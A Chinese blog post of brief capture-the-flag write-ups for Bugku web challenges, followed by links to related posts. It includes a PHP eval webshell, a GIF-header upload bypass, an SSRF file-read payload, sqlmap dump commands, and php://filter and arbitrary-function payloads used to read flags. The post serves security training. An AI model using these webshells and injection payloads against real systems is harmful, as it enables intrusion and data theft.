bugku练习(持续更新中~)

最新推荐文章于 2024-10-07 20:18:31 发布
最新推荐文章于 2024-10-07 20:18:31 发布
阅读量394 收藏 9
点赞数 4
文章标签: 安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_69602647/article/details/140803406
版权

web题

filter-madness

搞了半天 发现这个flag在info里面......

Ctrl + F 搜索ctf

nextGen 1

查看源代码 没有什么线索-> 查看其中的js->源代码最下面的js中发现一个post参数

访问request目录->抓包->修改请求方法->使用SSRF->service=file:///flag.txt

Upload 0

发现一个上传文件的: 试试上传一句话木马试试

<?php @eval($_POST['cmd']);?>

上传成功

蚁剑连接:

找到/flag.txt

Upload 1

上传文件->上传了一个带有gif文件头的php木马

GIF89a
<?php @eval($_POST['cmd']);?>

蚁剑连接->更目录下查看flag.txt

Virtual Shop

没什么线索 试试sql注入吧

发现是 单引号字符型注入

order by 4 ->回显是1,4->好像不是mysql

尝试sqlmap->SQLlite数据库

python sqlmap.py -u "http://82.157.146.43:14910/filter?category=IT" --tables --batch

查看users表内容:

python sqlmap.py -u "http://82.157.146.43:14910/filter?category=IT" -T users --dump --batch

发现flag!

command-injection

没什么线索->查看源代码: 发现一个提示 应该是存在文件包含了

访问include.php ->file参数可控

使用php伪协议包含 ->php://filter协议 查看base64编码的源码->

file=php://filter/read=convert.base64-encode/resource=include
PD9waHAgIGVycm9yX3JlcG9ydGluZygwKTsKQCRmaWxlID0gJF9HRVRbImZpbGUiXTsKaWYoaXNzZXQoJGZpbGUpKSB7CglpZiAocHJlZ19tYXRjaCgnL2h0dHB8ZGF0YXxmdHB8aW5wdXR8JTAwfGZsYWcvaScsICRmaWxlKSB8fCBzdHJzdHIoJGZpbGUsIi4uIikgIT09IEZBTFNFIHx8IHN0cmxlbigkZmlsZSk+PTEwMCkgewoJCWVjaG8gIjxwPiBlcnJvciEgPC9wPiI7Cgl9IGVsc2UgewoJCWluY2x1ZGUoJGZpbGUuJy5waHAnKTsKCQlzZXRjb29raWUoInRpcHMiLCJjcmVhdGVmdW4ucGhwIik7Cgl9Cn0gZWxzZSB7CgloZWFkZXIoJ0xvY2F0aW9uOmluY2x1ZGUucGhwP2ZpbGU9aW5kZXgnKTsKfQo/Pg==
<?php  error_reporting(0);
@$file = $_GET["file"];
if(isset($file)) {
	if (preg_match('/http|data|ftp|input|%00|flag/i', $file) || strstr($file,"..") !== FALSE || strlen($file)>=100) {
		echo "<p> error! </p>";
	} else {
		include($file.'.php');
		setcookie("tips","createfun.php");
	}
} else {
	header('Location:include.php?file=index');
}
?>

发现其中有个: createfun.php

尝试查看 createfun.php源码

PD9waHAKJGZ1bmMgPSBAJF9HRVRbJ2Z1bmMnXTsKJGFyZyA9IEAkX0dFVFsnYXJnJ107CmlmKGlzc2V0KCRmdW5jKSYmaXNzZXQoJGFyZykpeyRmdW5jKCRhcmcsJycpO30KCg==
<?php
$func = @$_GET['func'];
$arg = @$_GET['arg'];
if(isset($func)&&isset($arg)){$func($arg,'');}

在这个页面中可以执行填写的自定义的函数!

/createfun.php?func=show_source&arg=flag.php

出flag!

雾魈
关注
[Re]bugku CTF逆向题(持续更新
Hello World.c
12-05 3170
目录 bugku 入门逆向题解 bugku easy_vb题解 bugku easy_re bugku 游戏过关题解 bugku love题解 bugku file题解 待续 bugku 入门逆向题解 打开程序,一闪而过去 控制台环境打开 只有一串字符,再次拖入ida   em,啥都没有,flag果然就是这串字符 bugku easy_vb题解 一个vb写的程...
ctf web5 练习_BUGKU CTF 论剑场 WEB题 5-15pt 送分题 writeup~
weixin_32585497的博客
12-29 846
1.web26解题:打开页面发现如下代码:
BugKu-web】lfi--本地包含
weixin_73625393的博客
10-24 167
1.启动场景方法一:2.页面输入:flag:shellmates{SH0uLD_H4Ve_MadE_th3_checK_recuRS1V3}方法二:双编写绕过。
Bugku CTF】web解题记录
2302_78903258的博客
06-23 1382
记录我在Bugku CTF靶场做的比赛真题,便于自己以后的复习。
小白从0学习ctf(web安全
zyh1588的博客
03-30 1588
小白从0学习ctf(web安全-文件包含漏洞1)
BugKu-charlottesweb
weixin_44120336的博客
05-05 139
然后我们用linux系统发送一个请求,注意linux系统区分大小写,并且要加上它的IP地址,因为是这个ip下的文件,最后答案就出来啦wctf{y0u_h4v3_b33n_my_fr13nd___th4t_1n_1t53lf_1s_4_tr3m3nd0u5_th1ng}这里写着/src用get方式打开返回一个文件,而发送一个请求给/super-secret-route-nobody-will-guess以put的方式发送返回flag值。上来就被摆了一道,让我们再去源代码里看看。首先,让我们先点进去看看。
Bugku-web题Writeup(持续更新
qq_45628145的博客
02-18 678
Bugku-web题Writeup 这里会持续更新bugku练习平台上面web题的writeup,我也是个新手,如果有什么不对的地方,欢迎大家指出,如果大家觉得写的不错的话,别忘了点个赞哦! 1.Web2 打开之后,一堆滑稽脸在动,按照惯例,f12,发现flag就在源码。 于是得到flag。 计算器 打开之后,发现是一个加法题。 准备输入答案121的时候,发现只可以按1个数字,于是f12,发现...
青少年CTF练习WP (持续更新
HelloWrod6868的博客
02-22 814
青少年CTF练习平台wp
bugku 基础解题 一(记录学习过程)
m0_51991743的博客
09-16 2198
bugku 基础解题一(记录学习过程) web–滑稽 滑稽点进去看太难受了,脑袋疼,直接看源代码就可以看到flag web–计算器 要求提交计算结果但是查看源代码,提交结果的数字最大位数是1,于是本来想修改最大长度,因为没用工具,而且看见看见有一个js.code的源代码,就在url后面加上了js/code.js返回页面,得到源代码,成功查看flag。 但其实这题应该还有很多解法,之后学习到了再返回来看、 web–get 查看页面 php代码的意思是: 利用get请求获得变量what,如果变量wha
杂项题目练习bugku练习
04-05
- **缩略图分析**:有时候图片的缩略图与其他部分不匹配,可能是因为文件被修改过但未更新缩略图信息。 - **修改图片尺寸**:在某些情况下,通过改变图片的尺寸可以揭示隐藏信息,比如将高度改为与宽度相同。 #### ...
Bugku CTF MISC(持续更新~~)
m0_50043719的博客
07-17 212
签到题 flag{BugKu-Sec-pwn!} 社工-进阶收集
Bugku-WEB-writeup(持续学习~)
devil_sad的博客
11-12 3358
滑稽 打开题目发现一堆笑脸怼脸 按F12直接查看网页源代码即可获得flag 计算器 打开之后发现需要计算并输入验证码,可只能输入一位数字 我们可以右键单击输入框审查元素把maxlength改成3,使得我们能在验证框输入三位数 输入验证码即可得到flag 或者我们也可以直接点击上文红框的"js/code.js"也可以直接查看flag POST 通过阅读代码得知$what=='flag'即可得到flag 可是我们直接在URL后输入无法得到flag,于是...
BugKu做题记录【pwn】(持续更新
Assassin
04-06 3856
文章目录repeater1.题目分析2.我的错误思路3.正确思路4.利用代码5.知识点总结 好久不做题了,刚刚开始的签到题就做了三天,感觉水平确实下降得太厉害了,恢复训练~ ** ** repeater 1.题目分析 题目逻辑非常简单,就是read函数输入内容,然后printf输出,经过观察和简单得调试,我们需要注意到几个内容 pinrtf存在格式化字符串漏洞 read长度为0x64,不足以造成栈溢出 经过权限查询发现开启了NX保护,RELRO是部分开启,也就是堆栈不可执行 经过查看,bss段不可执
信息安全工程师(28)机房安全分析与防护
m0_73399576的博客
10-02 1133
信息安全工程师——机房安全分析与防护篇
CSRF 漏洞 - 学习手册
Blue17 の 小窝
10-05 560
CSRF 漏洞从初识到挖掘全流程笔记合集
HCIP--以太网交换安全(二)&端口安全
最新发布
2401_83878929的博客
10-07 1130
端口安全MAC地址
Web安全 - 安全防御工具和体系构建
小工匠
10-03 1524
最终,设计一个适合公司的安全体系,既是对安全人员技术能力的考验,也是对其与业务发展需求契合度的挑战。安全防御工具只是辅助,最终的效果取决于如何选择和实施它们。
2021 BugKu CTF AWD排位赛真题解析
BugKu 2021 CTF AWD排位赛真题涵盖了信息安全领域一项重要的技能竞技——Capture The Flag(CTF)的高级竞赛部分,即AWD(Attack With Defense,攻防对抗)模式。该模式特别强调攻防兼备的技能,要求参赛者在进行...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值